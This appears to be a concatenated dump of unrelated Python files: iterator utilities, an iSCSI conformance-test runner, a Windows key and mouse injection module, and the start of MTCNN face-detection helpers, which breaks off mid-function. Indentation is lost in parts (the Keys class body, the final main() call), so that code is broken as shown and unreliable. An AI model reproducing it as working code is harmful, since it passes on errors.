            # Print here as well as forwarding: preserves the traceback text
            # from inside the worker process.
            print("!!! Exception '%s' in inner worker of DoubleBufferedIterator:\n %s" % (e, "".join(
                traceback.format_tb(tb)
            )))
            self.__buffer_inner.put((e, tb), block=True)

    def __worker_outer(self) -> None:
        """Consumes elements from the inner worker and just passes them through to the outer buffer."""
        try:
            next_element = self.__buffer_inner.get(block=True)
            while next_element is not None:
                self.__buffer_outer.put(next_element, block=True)
                next_element = self.__buffer_inner.get(block=True)
            # Forward the terminating None as well.
            self.__buffer_outer.put(next_element, block=True)
        except Exception as e:
            _, __, tb = sys.exc_info()
            print("!!! Exception '%s' in outer worker of DoubleBufferedIterator:\n %s" % (
                e, "".join(traceback.format_tb(tb))
            ))
            self.__buffer_outer.put((e, tb), block=True)

    def __iter__(self):
        return self

    def __next__(self):
        next_element = self.__buffer_outer.get(block=True)
        if isinstance(next_element, tuple) and isinstance(next_element[0], Exception):
            # Re-raise worker exceptions in the consumer with their traceback.
            raise next_element[0].with_traceback(next_element[1])
        elif next_element is None:
            self.__worker_process_inner.join()
            self.__worker_process_outer.join()
            raise StopIteration
        return next_element
def shuffled_iterator(input_iterator: Iterator[T], buffer_size: int = 10000, out_slice_sizes: int = 500) -> Iterator[T]:
    """Wraps an iterator in a streaming, memory-bounded approximate shuffle.

    A reservoir of elements is accumulated; whenever it overflows
    `buffer_size`, it is shuffled and `out_slice_sizes` random elements are
    yielded from its tail. Elements that arrive early therefore have a bias
    towards being yielded early.

    Args:
        input_iterator: The source of elements.
        buffer_size: Maximum number of buffered elements.
        out_slice_sizes: How many elements to emit each time the buffer fills.

    Yields:
        All elements of `input_iterator`, in approximately shuffled order.
    """
    assert out_slice_sizes <= buffer_size, 'out_slices_size cannot be larger than buffer_size.'
    reservoir = []  # type: List[T]
    for item in input_iterator:
        reservoir.append(item)
        if len(reservoir) > buffer_size:
            random.shuffle(reservoir)
            remaining = out_slice_sizes
            while remaining > 0:
                yield reservoir.pop()
                remaining -= 1
    # Drain whatever is left, shuffled one final time.
    random.shuffle(reservoir)
    yield from reservoir
|
calsoft.py | import os
import time
import sys
import subprocess
import threading
import json
# Location of the Calsoft iSCSI conformance-test binaries on the machine.
CALSOFT_BIN_PATH = "/usr/local/calsoft/iscsi-pcts-v1.5/bin"
'''
11/26/2015 disable tc_login_11_2 and tc_login_11_4
RFC 7143 6.3
Neither the initiator nor the target should attempt to declare or
negotiate a parameter more than once during login, except for
responses to specific keys that explicitly allow repeated key
declarations (e.g., TargetAddress)
The spec didn't make it clear what other keys could be re-declare
Disscussed this with UNH and get the conclusion that TargetName/
TargetAddress/MaxRecvDataSegmentLength could be re-declare.
'''
'''
12/1/2015 add tc_login_2_2 to known_failed_cases
RFC 7143 6.1
A standard-label MUST begin with a capital letter and must not exceed
63 characters.
key name: A standard-label
'''
# Cases known to fail against this target (see the notes above); they are
# reported as SKIP instead of being executed.
known_failed_cases = ['tc_ffp_15_2', 'tc_ffp_29_2', 'tc_ffp_29_3',
                      'tc_err_1_1', 'tc_err_1_2', 'tc_err_2_8',
                      'tc_err_3_1', 'tc_err_3_2', 'tc_err_3_3',
                      'tc_err_3_4', 'tc_err_5_1', 'tc_login_3_1',
                      'tc_login_11_2', 'tc_login_11_4', 'tc_login_2_2']
def run_case(case, result_list, log_dir_path):
    """Runs one Calsoft test binary and records its pass/fail status.

    Args:
        case: Name of the test binary under CALSOFT_BIN_PATH.
        result_list: Shared list receiving {"Name", "Result"} entries.
        log_dir_path: Directory (with trailing slash) for per-case logs.
    """
    cmd = "{}/{}".format(CALSOFT_BIN_PATH, case)
    try:
        case_log = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
    except subprocess.CalledProcessError as e:
        case_log = e.output
        result_list.append({"Name": case, "Result": "FAIL"})
    else:
        result_list.append({"Name": case, "Result": "PASS"})
    with open(log_dir_path + case + '.txt', 'w') as f:
        f.write(case_log)
def main():
    """Runs the Calsoft iSCSI conformance suite and writes a JSON summary.

    argv[1] is the output directory; optional argv[2] overrides the JSON
    result path. Known-bad cases are reported as SKIP; the rest run on a
    bounded pool of threads. Exits 1 when the suite is missing, a worker
    hangs past the 30s grace period, or any case fails.
    """
    if not os.path.exists(CALSOFT_BIN_PATH):
        # Parenthesized single-argument print keeps this file runnable on
        # both Python 2 and Python 3.
        print("The Calsoft test suite is not available on this machine.")
        sys.exit(1)
    output_dir = sys.argv[1]
    if len(sys.argv) > 2:
        output_file = sys.argv[2]
    else:
        output_file = "%s/calsoft.json" % (output_dir)
    log_dir = "%s/calsoft/" % output_dir
    all_cases = [x for x in os.listdir(CALSOFT_BIN_PATH) if x.startswith('tc')]
    all_cases.sort()
    case_result_list = []
    result = {"Calsoft iSCSI tests": case_result_list}
    if not os.path.exists(log_dir):
        os.mkdir(log_dir)
    for case in known_failed_cases:
        print("Skipping %s. It is known to fail." % (case))
        case_result_list.append({"Name": case, "Result": "SKIP"})
    thread_objs = []
    left_cases = list(set(all_cases) - set(known_failed_cases))
    index = 0
    max_thread_count = 32
    while index < len(left_cases):
        # Count live workers, then top the pool back up to the limit.
        cur_thread_count = 0
        for thread_obj in thread_objs:
            if thread_obj.is_alive():
                cur_thread_count += 1
        while cur_thread_count < max_thread_count and index < len(left_cases):
            thread_obj = threading.Thread(
                target=run_case,
                args=(left_cases[index], case_result_list, log_dir, ))
            thread_obj.start()
            time.sleep(0.02)
            thread_objs.append(thread_obj)
            index += 1
            cur_thread_count += 1
        # IMPROVEMENT: pause between pool checks instead of busy-spinning.
        time.sleep(0.1)
    end_time = time.time() + 30
    while time.time() < end_time:
        for thread_obj in thread_objs:
            if thread_obj.is_alive():
                break
        else:
            break  # every worker has finished
        # IMPROVEMENT: poll instead of spinning while waiting for workers.
        time.sleep(0.1)
    else:
        print("Thread timeout")
        exit(1)
    with open(output_file, 'w') as f:
        json.dump(obj=result, fp=f, indent=2)
    failed = 0
    for x in case_result_list:
        if x["Result"] == "FAIL":
            print("Test case %s failed." % (x["Name"]))
            failed = 1
    exit(failed)
if __name__ == '__main__':
main()
|
keys.py | # Code by Daniel Kukiela (https://twitter.com/daniel_kukiela)
# downloaded from https://github.com/Sentdex/pygta5/blob/master/keys.py
import ctypes
from threading import Thread
from time import time, sleep
from queue import Queue
# main keys class
class Keys(object):
common = None       # host-application helper used for logging (None => standalone)
standalone = False  # set to True in __init__ when no `common` is supplied
# instance of worker class
keys_worker = None
keys_process = None  # background Thread draining the key queue
# key constants
# NOTE(review): presumably dwFlags values for the Windows input APIs --
# 0x0008 looks like the scan-code flag and 0x0002 like key-up; confirm
# against the SendInput/keybd_event documentation.
direct_keys = 0x0008
virtual_keys = 0x0000
key_press = 0x0000
key_release = 0x0002
# mouse constants
# NOTE(review): values match the MOUSEEVENTF_* flag layout -- confirm.
mouse_move = 0x0001
mouse_lb_press = 0x0002
mouse_lb_release = 0x0004
mouse_rb_press = 0x0008
mouse_rb_release = 0x0010
mouse_mb_press = 0x0020
mouse_mb_release = 0x0040
# direct keys
dk = {
"1": 0x02,
"2": 0x03,
"3": 0x04,
"4": 0x05,
"5": 0x06,
"6": 0x07,
"7": 0x08,
"8": 0x09,
"9": 0x0A,
"0": 0x0B,
"NUMPAD1": 0x4F, "NP1": 0x4F,
"NUMPAD2": 0x50, "NP2": 0x50,
"NUMPAD3": 0x51, "NP3": 0x51,
"NUMPAD4": 0x4B, "NP4": 0x4B,
"NUMPAD5": 0x4C, "NP5": 0x4C,
"NUMPAD6": 0x4D, "NP6": 0x4D,
"NUMPAD7": 0x47, "NP7": 0x47,
"NUMPAD8": 0x48, "NP8": 0x48,
"NUMPAD9": 0x49, "NP9": 0x49,
"NUMPAD0": 0x52, "NP0": 0x52,
"DIVIDE": 0xB5, "NPDV": 0xB5,
"MULTIPLY": 0x37, "NPM": 0x37,
"SUBSTRACT": 0x4A, "NPS": 0x4A,
"ADD": 0x4E, "NPA": 0x4E,
"DECIMAL": 0x53, "NPDC": 0x53,
"NUMPADENTER": 0x9C, "NPE": 0x9C,
"A": 0x1E,
"B": 0x30,
"C": 0x2E,
"D": 0x20,
"E": 0x12,
"F": 0x21,
"G": 0x22,
"H": 0x23,
"I": 0x17,
"J": 0x24,
"K": 0x25,
"L": 0x26,
"M": 0x32,
"N": 0x31,
"O": 0x18,
"P": 0x19,
"Q": 0x10,
"R": 0x13,
"S": 0x1F,
"T": 0x14,
"U": 0x16,
"V": 0x2F,
"W": 0x11,
"X": 0x2D,
"Y": 0x15,
"Z": 0x2C,
"F1": 0x3B,
"F2": 0x3C,
"F3": 0x3D,
"F4": 0x3E,
"F5": 0x3F,
"F6": 0x40,
"F7": 0x41,
"F8": 0x42,
"F9": 0x43,
"F10": 0x44,
"F11": 0x57,
"F12": 0x58,
"UP": 0xC8,
"LEFT": 0xCB,
"RIGHT": 0xCD,
"DOWN": 0xD0,
"ESC": 0x01,
"SPACE": 0x39, "SPC": 0x39,
"RETURN": 0x1C, "ENT": 0x1C,
"INSERT": 0xD2, "INS": 0xD2,
"DELETE": 0xD3, "DEL": 0xD3,
"HOME": 0xC7,
"END": 0xCF,
"PRIOR": 0xC9, "PGUP": 0xC9,
"NEXT": 0xD1, "PGDN": 0xD1,
"BACK": 0x0E,
"TAB": 0x0F,
"LCONTROL": 0x1D, "LCTRL": 0x1D,
"RCONTROL": 0x9D, "RCTRL": 0x9D,
"LSHIFT": 0x2A, "LSH": 0x2A,
"RSHIFT": 0x36, "RSH": 0x36,
"LMENU": 0x38, "LALT": 0x38,
"RMENU": 0xB8, "RALT": 0xB8,
"LWIN": 0xDB,
"RWIN": 0xDC,
"APPS": 0xDD,
"CAPITAL": 0x3A, "CAPS": 0x3A,
"NUMLOCK": 0x45, "NUM": 0x45,
"SCROLL": 0x46, "SCR": 0x46,
"MINUS": 0x0C, "MIN": 0x0C,
"LBRACKET": 0x1A, "LBR": 0x1A,
"RBRACKET": 0x1B, "RBR": 0x1B,
"SEMICOLON": 0x27, "SEM": 0x27,
"APOSTROPHE": 0x28, "APO": 0x28,
"GRAVE": 0x29, "GRA": 0x29,
"BACKSLASH": 0x2B, "BSL": 0x2B,
"COMMA": 0x33, "COM": 0x33,
"PERIOD": 0x34, "PER": 0x34,
"SLASH": 0x35, "SLA": 0x35,
}
# virtual keys
vk = {
"1": 0x31,
"2": 0x32,
"3": 0x33,
"4": 0x34,
"5": 0x35,
"6": 0x36,
"7": 0x37,
"8": 0x38,
"9": 0x39,
"0": 0x30,
"NUMPAD1": 0x61, "NP1": 0x61,
"NUMPAD2": 0x62, "NP2": 0x62,
"NUMPAD3": 0x63, "NP3": 0x63,
"NUMPAD4": 0x64, "NP4": 0x64,
"NUMPAD5": 0x65, "NP5": 0x65,
"NUMPAD6": 0x66, "NP6": 0x66,
"NUMPAD7": 0x67, "NP7": 0x67,
"NUMPAD8": 0x68, "NP8": 0x68,
"NUMPAD9": 0x69, "NP9": 0x69,
"NUMPAD0": 0x60, "NP0": 0x60,
"DIVIDE": 0x6F, "NPDV": 0x6F,
"MULTIPLY": 0x6A, "NPM": 0x6A,
"SUBSTRACT": 0x6D, "NPS": 0x6D,
"ADD": 0x6B, "NPA": 0x6B,
"DECIMAL": 0x6E, "NPDC": 0x6E,
"NUMPADENTER": 0x0D, "NPE": 0x0D,
"A": 0x41,
"B": 0x42,
"C": 0x43,
"D": 0x44,
"E": 0x45,
"F": 0x46,
"G": 0x47,
"H": 0x48,
"I": 0x49,
"J": 0x4A,
"K": 0x4B,
"L": 0x4C,
"M": 0x4D,
"N": 0x4E,
"O": 0x4F,
"P": 0x50,
"Q": 0x51,
"R": 0x52,
"S": 0x53,
"T": 0x54,
"U": 0x55,
"V": 0x56,
"W": 0x57,
"X": 0x58,
"Y": 0x59,
"Z": 0x5A,
"F1": 0x70,
"F2": 0x71,
"F3": 0x72,
"F4": 0x73,
"F5": 0x74,
"F6": 0x75,
"F7": 0x76,
"F8": 0x77,
"F9": 0x78,
"F10": 0x79,
"F11": 0x7A,
"F12": 0x7B,
"UP": 0x26,
"LEFT": 0x25,
"RIGHT": 0x27,
"DOWN": 0x28,
"ESC": 0x1B,
"SPACE": 0x20, "SPC": 0x20,
"RETURN": 0x0D, "ENT": 0x0D,
"INSERT": 0x2D, "INS": 0x2D,
"DELETE": 0x2E, "DEL": 0x2E,
"HOME": 0x24,
"END": 0x23,
"PRIOR": 0x21, "PGUP": 0x21,
"NEXT": 0x22, "PGDN": 0x22,
"BACK": 0x08,
"TAB": 0x09,
"LCONTROL": 0xA2, "LCTRL": 0xA2,
"RCONTROL": 0xA3, "RCTRL": 0xA3,
"LSHIFT": 0xA0, "LSH": 0xA0,
"RSHIFT": 0xA1, "RSH": 0xA1,
"LMENU": 0xA4, "LALT": 0xA4,
"RMENU": 0xA5, "RALT": 0xA5,
"LWIN": 0x5B,
"RWIN": 0x5C,
"APPS": 0x5D,
"CAPITAL": 0x14, "CAPS": 0x14,
"NUMLOCK": 0x90, "NUM": 0x90,
"SCROLL": 0x91, "SCR": 0x91,
"MINUS": 0xBD, "MIN": 0xBD,
"LBRACKET": 0xDB, "LBR": 0xDB,
"RBRACKET": 0xDD, "RBR": 0xDD,
"SEMICOLON": 0xBA, "SEM": 0xBA,
"APOSTROPHE": 0xDE, "APO": 0xDE,
"GRAVE": 0xC0, "GRA": 0xC0,
"BACKSLASH": 0xDC, "BSL": 0xDC,
"COMMA": 0xBC, "COM": 0xBC,
"PERIOD": 0xBE, "PER": 0xBE,
"SLASH": 0xBF, "SLA": 0xBF,
}
# setup object
def __init__(self, common = None):
    """Initializes the key sender and its worker.

    Args:
        common: Optional host-application helper (used for logging in
            parseKeyString); when None the class runs in standalone mode.
    """
    self.keys_worker = KeysWorker(self)
    # Thread(target=self.keys_worker.processQueue).start()
    self.common = common
    if common is None:
        self.standalone = True
# parses keys string and adds keys to the queue
def parseKeyString(self, string):
    """Parse a comma-separated key string and enqueue the key events.

    Tokens: key names (optionally suffixed ``_UP``/``_DOWN``), ``VK``/``DK``
    to switch lookup tables, ``0x..`` raw key codes (1-255), and ``-N``
    pauses in milliseconds (up to 10 s).

    :returns: True on success, or the list of unrecognized tokens, in
        which case nothing is queued.
    """
    if not self.standalone:
        self.common.info("Processing keys: %s" % string)
    key_queue = []
    errors = []
    # defaults to direct keys
    key_type = self.direct_keys
    # split by comma
    keys = string.upper().split(",")
    # translate
    for key in keys:
        # up, down or stroke?
        up = True
        down = True
        direction = key.split("_")
        subkey = direction[0]
        if len(direction) >= 2:
            if direction[1] == 'UP':
                down = False
            else:
                up = False
        # switch to virtual keys
        if subkey == "VK":
            key_type = self.virtual_keys
        # switch to direct keys
        elif subkey == "DK":
            key_type = self.direct_keys
        # raw key code
        # Fix: the whole string was upper-cased above, so hex tokens arrive
        # as "0X.."; the previous startswith("0x") check never matched and
        # every raw key code was rejected as an error.
        elif subkey.startswith("0X"):
            subkey = int(subkey, 16)
            if subkey > 0 and subkey < 256:
                key_queue.append({
                    "key": int(subkey),
                    "okey": subkey,
                    "time": 0,
                    "up": up,
                    "down": down,
                    "type": key_type,
                })
            else:
                errors.append(key)
        # pause
        elif subkey.startswith("-"):
            time = float(subkey.replace("-", ""))/1000
            if time > 0 and time <= 10:
                key_queue.append({
                    "key": None,
                    "okey": "",
                    "time": time,
                    "up": False,
                    "down": False,
                    "type": None,
                })
            else:
                errors.append(key)
        # direct key
        elif key_type == self.direct_keys and subkey in self.dk:
            key_queue.append({
                "key": self.dk[subkey],
                "okey": subkey,
                "time": 0,
                "up": up,
                "down": down,
                "type": key_type,
            })
        # virtual key
        elif key_type == self.virtual_keys and subkey in self.vk:
            key_queue.append({
                "key": self.vk[subkey],
                "okey": subkey,
                "time": 0,
                "up": up,
                "down": down,
                "type": key_type,
            })
        # no match?
        else:
            errors.append(key)
    # if there are errors, do not process keys
    if len(errors):
        return errors
    # create new thread if there is no active one
    # Fix: Thread.isAlive() was removed in Python 3.9; use is_alive().
    if self.keys_process is None or not self.keys_process.is_alive():
        self.keys_process = Thread(target=self.keys_worker.processQueue)
        self.keys_process.start()
    # add keys to queue
    for i in key_queue:
        self.keys_worker.key_queue.put(i)
    self.keys_worker.key_queue.put(None)
    return True
# direct key press
def directKey(self, key, direction = None, type = None):
    """Send a single key event immediately (not via the queue).

    :param key: key name looked up in the dk/vk tables, or a raw "0x.."
        hex code string.
    :param direction: press/release flag; defaults to ``self.key_press``.
    :param type: ``self.direct_keys`` (default) or ``self.virtual_keys``.
    """
    if type is None:
        type = self.direct_keys
    if direction is None:
        direction = self.key_press
    if key.startswith("0x"):
        # Fix: use the raw hex code as-is.  Previously the converted int
        # was still run through the name lookup table (whose keys are
        # strings), so it always missed and key 0 was sent instead.
        key = int(key, 16)
    else:
        key = key.upper()
        lookup_table = self.dk if type == self.direct_keys else self.vk
        key = lookup_table[key] if key in lookup_table else 0x0000
    self.keys_worker.sendKey(key, direction | type)
# direct mouse move or button press
def directMouse(self, dx = 0, dy = 0, buttons = 0):
    """Forward a relative mouse move and/or button mask to the worker."""
    worker = self.keys_worker
    worker.sendMouse(dx, dy, buttons)
# threaded sending keys class
class KeysWorker():
    """Consumes queued key events and injects them through the Win32
    ``SendInput`` API (ctypes structures defined later in this module).
    Runs ``processQueue`` on a worker thread started by the owner.
    """
    # back-reference to the owning Keys instance (flags, lookup tables)
    keys = None
    # queue of pending key events
    # NOTE(review): declared at class level, so all KeysWorker instances
    # share a single Queue — confirm only one worker is ever created.
    key_queue = Queue()
    # init
    def __init__(self, keys):
        self.keys = keys
    # main function, process key's queue in loop
    def processQueue(self):
        """Drain the queue, pressing/releasing keys with the requested
        timing.  A ``None`` sentinel ends the loop once the queue is
        empty; otherwise processing continues with the next item.
        """
        # endless loop
        while True:
            # get one key (blocks until available)
            key = self.key_queue.get()
            # terminate process if queue is empty
            if key is None:
                self.key_queue.task_done()
                if self.key_queue.empty():
                    return
                continue
            # print key (only when hosted by a common application object)
            elif not self.keys.standalone:
                self.keys.common.info("Key: \033[1;35m%s/%s\033[0;37m, duration: \033[1;35m%f\033[0;37m, direction: \033[1;35m%s\033[0;37m, type: \033[1;35m%s" % (
                    key["okey"] if key["okey"] else "None",
                    key["key"], key["time"],
                    "UP" if key["up"] and not key["down"] else "DOWN" if not key["up"] and key["down"] else "BOTH" if key["up"] and key["down"] else "NONE",
                    "None" if key["type"] is None else "DK" if key["type"] == self.keys.direct_keys else "VK"), "\033[0;35mKEY: \033[0;37m"
                )
            # if it's a key
            if key["key"]:
                # press
                if key["down"]:
                    self.sendKey(key["key"], self.keys.key_press | key["type"])
                # wait the configured duration between press and release
                sleep(key["time"])
                # and release
                if key["up"]:
                    self.sendKey(key["key"], self.keys.key_release | key["type"])
            # not an actual key, just pause
            else:
                sleep(key["time"])
            # mark as done (decrement internal queue counter)
            self.key_queue.task_done()
    # send key
    def sendKey(self, key, type):
        """Inject one keyboard event; ``type`` carries direction + DK/VK flags."""
        self.SendInput(self.Keyboard(key, type))
    # send mouse
    def sendMouse(self, dx, dy, buttons):
        """Inject one mouse event; adds the move flag when dx/dy are non-zero."""
        if dx != 0 or dy != 0:
            buttons |= self.keys.mouse_move
        self.SendInput(self.Mouse(buttons, dx, dy))
    # send input
    def SendInput(self, *inputs):
        """Hand an array of INPUT structures to user32.SendInput (Windows only)."""
        nInputs = len(inputs)
        LPINPUT = INPUT * nInputs
        pInputs = LPINPUT(*inputs)
        cbSize = ctypes.c_int(ctypes.sizeof(INPUT))
        return ctypes.windll.user32.SendInput(nInputs, pInputs, cbSize)
    # get input object
    def Input(self, structure):
        """Wrap a MOUSE/KEYBD/HARDWAREINPUT in an INPUT with the matching type tag."""
        if isinstance(structure, MOUSEINPUT):
            return INPUT(0, _INPUTunion(mi=structure))
        if isinstance(structure, KEYBDINPUT):
            return INPUT(1, _INPUTunion(ki=structure))
        if isinstance(structure, HARDWAREINPUT):
            return INPUT(2, _INPUTunion(hi=structure))
        raise TypeError('Cannot create INPUT structure!')
    # mouse input
    def MouseInput(self, flags, x, y, data):
        return MOUSEINPUT(x, y, data, flags, 0, None)
    # keyboard input
    def KeybdInput(self, code, flags):
        # the same code is used for both wVk and wScan; flags decide which applies
        return KEYBDINPUT(code, code, flags, 0, None)
    # hardware input
    def HardwareInput(self, message, parameter):
        return HARDWAREINPUT(message & 0xFFFFFFFF,
                             parameter & 0xFFFF,
                             parameter >> 16 & 0xFFFF)
    # mouse object
    def Mouse(self, flags, x=0, y=0, data=0):
        return self.Input(self.MouseInput(flags, x, y, data))
    # keyboard object
    def Keyboard(self, code, flags=0):
        return self.Input(self.KeybdInput(code, flags))
    # hardware object
    def Hardware(self, message, parameter=0):
        return self.Input(self.HardwareInput(message, parameter))
# types
# ctypes aliases matching the Win32 typedefs used by the INPUT structures.
LONG = ctypes.c_long
DWORD = ctypes.c_ulong
# NOTE(review): Win32 ULONG_PTR is a pointer-sized unsigned integer; it is
# modelled here as POINTER(DWORD), which works because the code above only
# ever passes None for dwExtraInfo — confirm before passing real values.
ULONG_PTR = ctypes.POINTER(DWORD)
WORD = ctypes.c_ushort
class MOUSEINPUT(ctypes.Structure):
    # Win32 MOUSEINPUT: relative/absolute movement plus button/wheel data.
    _fields_ = (('dx', LONG),
                ('dy', LONG),
                ('mouseData', DWORD),
                ('dwFlags', DWORD),
                ('time', DWORD),
                ('dwExtraInfo', ULONG_PTR))
class KEYBDINPUT(ctypes.Structure):
    # Win32 KEYBDINPUT: virtual-key code, scan code and event flags.
    _fields_ = (('wVk', WORD),
                ('wScan', WORD),
                ('dwFlags', DWORD),
                ('time', DWORD),
                ('dwExtraInfo', ULONG_PTR))
class HARDWAREINPUT(ctypes.Structure):
    # Win32 HARDWAREINPUT: raw message plus low/high parameter words.
    _fields_ = (('uMsg', DWORD),
                ('wParamL', WORD),
                ('wParamH', WORD))
class _INPUTunion(ctypes.Union):
    # Union arm selected by INPUT.type below.
    _fields_ = (('mi', MOUSEINPUT),
                ('ki', KEYBDINPUT),
                ('hi', HARDWAREINPUT))
class INPUT(ctypes.Structure):
    # Win32 INPUT: type tag (0 = mouse, 1 = keyboard, 2 = hardware) + payload.
    _fields_ = (('type', DWORD),
                ('union', _INPUTunion))
#example:
if __name__ == '__main__':
    # Stand-alone demo: gives the user 3 s to focus the target window,
    # then exercises mouse and keyboard injection.
    sleep(3)
    keys = Keys()
    # mouse movement: 100 growing relative steps to the left
    for i in range(100):
        keys.directMouse(-1*i, 0)
        sleep(0.004)
    # mouse keys: right press, left click held 2 s, then release both
    keys.directMouse(buttons=keys.mouse_rb_press)
    sleep(0.5)
    keys.directMouse(buttons=keys.mouse_lb_press)
    sleep(2)
    keys.directMouse(buttons=keys.mouse_lb_release)
    sleep(0.5)
    keys.directMouse(buttons=keys.mouse_rb_release)
    # or combine several button flags in a single call
    keys.directMouse(buttons=keys.mouse_lb_press | keys.mouse_rb_press)
    sleep(2)
    keys.directMouse(buttons=keys.mouse_lb_release | keys.mouse_rb_release)
    # keyboard (direct keys)
    keys.directKey("a")
    sleep(0.04)
    keys.directKey("a", keys.key_release)
    # keyboard (virtual keys)
    keys.directKey("a", type=keys.virtual_keys)
    sleep(0.04)
    keys.directKey("a", keys.key_release, keys.virtual_keys)
    # queue of keys (direct keys, threaded, only for keybord input)
    # -4 pauses for 4 ms; 0x01 is the DirectInput scan code of Esc.
    # NOTE(review): parseKeyString upper-cases the whole string, turning
    # "0x01" into "0X01", which its startswith("0x") check misses — verify
    # that hex tokens are actually accepted here.
    keys.parseKeyString("a_down,-4,a_up,0x01")
    # queue of keys (virtual keys, threaded, only for keybord input)
    keys.parseKeyString("vk,a_down,-4,a_up")  # -4 - pause for 4 ms
|
demo_mp.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import _init_paths
import caffe
import cv2
import numpy as np
from python_wrapper import *
import os
from multiprocessing import Process, Queue
from timeit import default_timer as timer
from time import sleep
def bbreg(boundingbox, reg):
    """Calibrate bounding boxes in place with the network's regression
    offsets.  ``reg`` arrives as (4, N) and is transposed to (N, 4);
    offsets are expressed as fractions of the box width/height."""
    reg = reg.T
    if reg.shape[1] == 1:
        print("reshape of reg")
        pass  # reshape of reg
    widths = boundingbox[:, 2] - boundingbox[:, 0] + 1
    heights = boundingbox[:, 3] - boundingbox[:, 1] + 1
    shifted = np.array([
        boundingbox[:, 0] + reg[:, 0] * widths,
        boundingbox[:, 1] + reg[:, 1] * heights,
        boundingbox[:, 2] + reg[:, 2] * widths,
        boundingbox[:, 3] + reg[:, 3] * heights,
    ]).T
    boundingbox[:, 0:4] = shifted
    return boundingbox
def pad(boxesA, w, h):
    """Clip boxes to the image and compute source/destination crop indices.

    For each box returns: destination start/end (dy..edx) inside the
    zero-padded crop, the clipped source start/end (y..ex) inside the
    image, and the full crop size (tmpw, tmph).  Indices are converted to
    0-based at the end (the matlab original was 1-based, hence the -1s).
    """
    boxes = boxesA.copy()  # copy: the in-place clipping below must not touch the caller's array
    tmph = boxes[:,3] - boxes[:,1] + 1
    tmpw = boxes[:,2] - boxes[:,0] + 1
    numbox = boxes.shape[0]
    # destination indices start at 1 (matlab convention at this point)
    dx = np.ones(numbox)
    dy = np.ones(numbox)
    edx = tmpw
    edy = tmph
    x = boxes[:,0:1][:,0]
    y = boxes[:,1:2][:,0]
    ex = boxes[:,2:3][:,0]
    ey = boxes[:,3:4][:,0]
    # boxes spilling over the right/bottom edge: pull the source end in
    # and shorten the destination end accordingly
    tmp = np.where(ex > w)[0]
    if tmp.shape[0] != 0:
        edx[tmp] = -ex[tmp] + w-1 + tmpw[tmp]
        ex[tmp] = w-1
    tmp = np.where(ey > h)[0]
    if tmp.shape[0] != 0:
        edy[tmp] = -ey[tmp] + h-1 + tmph[tmp]
        ey[tmp] = h-1
    # boxes starting left of / above the image: clamp the source start
    # and push the destination start forward
    tmp = np.where(x < 1)[0]
    if tmp.shape[0] != 0:
        dx[tmp] = 2 - x[tmp]
        x[tmp] = np.ones_like(x[tmp])
    tmp = np.where(y < 1)[0]
    if tmp.shape[0] != 0:
        dy[tmp] = 2 - y[tmp]
        y[tmp] = np.ones_like(y[tmp])
    # for python index from 0, while matlab from 1
    dy = np.maximum(0, dy-1)
    dx = np.maximum(0, dx-1)
    y = np.maximum(0, y-1)
    x = np.maximum(0, x-1)
    edy = np.maximum(0, edy-1)
    edx = np.maximum(0, edx-1)
    ey = np.maximum(0, ey-1)
    ex = np.maximum(0, ex-1)
    return [dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph]
def rerec(bboxA):
    """Expand each box in place to a square of side max(width, height),
    keeping the box center fixed."""
    widths = bboxA[:, 2] - bboxA[:, 0]
    heights = bboxA[:, 3] - bboxA[:, 1]
    sides = np.maximum(widths, heights).T
    bboxA[:, 0] = bboxA[:, 0] + widths * 0.5 - sides * 0.5
    bboxA[:, 1] = bboxA[:, 1] + heights * 0.5 - sides * 0.5
    bboxA[:, 2:4] = bboxA[:, 0:2] + np.repeat([sides], 2, axis=0).T
    return bboxA
def nms(boxes, threshold, type):
    """Non-maximum suppression.

    :boxes: (N, 5+) array, columns 0-3 are corners, column 4 is the score
    :threshold: overlap above which the lower-scored box is suppressed
    :type: 'Min' divides by the smaller area, anything else uses IoU
    :returns: list of kept row indices (highest score first)
    """
    if boxes.shape[0] == 0:
        return np.array([])
    x1 = boxes[:, 0]
    y1 = boxes[:, 1]
    x2 = boxes[:, 2]
    y2 = boxes[:, 3]
    scores = boxes[:, 4]
    area = np.multiply(x2 - x1 + 1, y2 - y1 + 1)
    order = np.array(scores.argsort())  # ascending; best candidate is last
    pick = []
    while len(order) > 0:
        best = order[-1]
        rest = order[0:-1]
        xx1 = np.maximum(x1[best], x1[rest])
        yy1 = np.maximum(y1[best], y1[rest])
        xx2 = np.minimum(x2[best], x2[rest])
        yy2 = np.minimum(y2[best], y2[rest])
        inter = np.maximum(0.0, xx2 - xx1 + 1) * np.maximum(0.0, yy2 - yy1 + 1)
        if type == 'Min':
            overlap = inter / np.minimum(area[best], area[rest])
        else:
            overlap = inter / (area[best] + area[rest] - inter)
        pick.append(best)
        # keep only candidates whose overlap with the pick is acceptable
        order = order[np.where(overlap <= threshold)[0]]
    return pick
def generateBoundingBox(map, reg, scale, t):
    """Turn a PNet score map into candidate boxes.

    Each position scoring >= ``t`` becomes a 12x12 receptive-field box
    mapped back to original-image coordinates through ``scale``.
    Returns an (N, 9) array: 4 corners, score, 4 regression offsets.
    """
    stride = 2
    cellsize = 12
    map = map.T
    dx1, dy1, dx2, dy2 = (reg[i, :, :].T for i in range(4))
    (x, y) = np.where(map >= t)
    score = map[x, y]
    reg = np.array([dx1[x, y], dy1[x, y], dx2[x, y], dy2[x, y]])
    corners = np.array([y, x]).T
    # matlab indexed from 1, hence the +1 before rescaling
    bb1 = np.fix((stride * corners + 1) / scale).T
    bb2 = np.fix((stride * corners + cellsize - 1 + 1) / scale).T
    boundingbox_out = np.concatenate((bb1, bb2, np.array([score]), reg), axis=0)
    return boundingbox_out.T
def drawBoxes(im, boxes):
    """Draw each box as a 1-px green rectangle on ``im`` and return it."""
    if boxes.shape[0] == 0 or boxes.shape[1] == 0:
        return im
    for x1, y1, x2, y2 in boxes[:, 0:4]:
        cv2.rectangle(im, (int(x1), int(y1)), (int(x2), int(y2)), (0, 255, 0), 1)
    return im
from time import time
# Stack of start times so tic()/toc() pairs can nest.
_tstart_stack = []
def tic():
    """Push the current time; paired with a later toc()."""
    _tstart_stack.append(time())
def toc(fmt="Elapsed: %s s"):
    """Pop the most recent tic() time and print the elapsed seconds."""
    elapsed = time() - _tstart_stack.pop()
    print(fmt % elapsed)
def detect_face(img, minsize, PNet, RNet, ONet, threshold, fastresize, factor):
    """Run the three-stage MTCNN cascade (PNet -> RNet -> ONet).

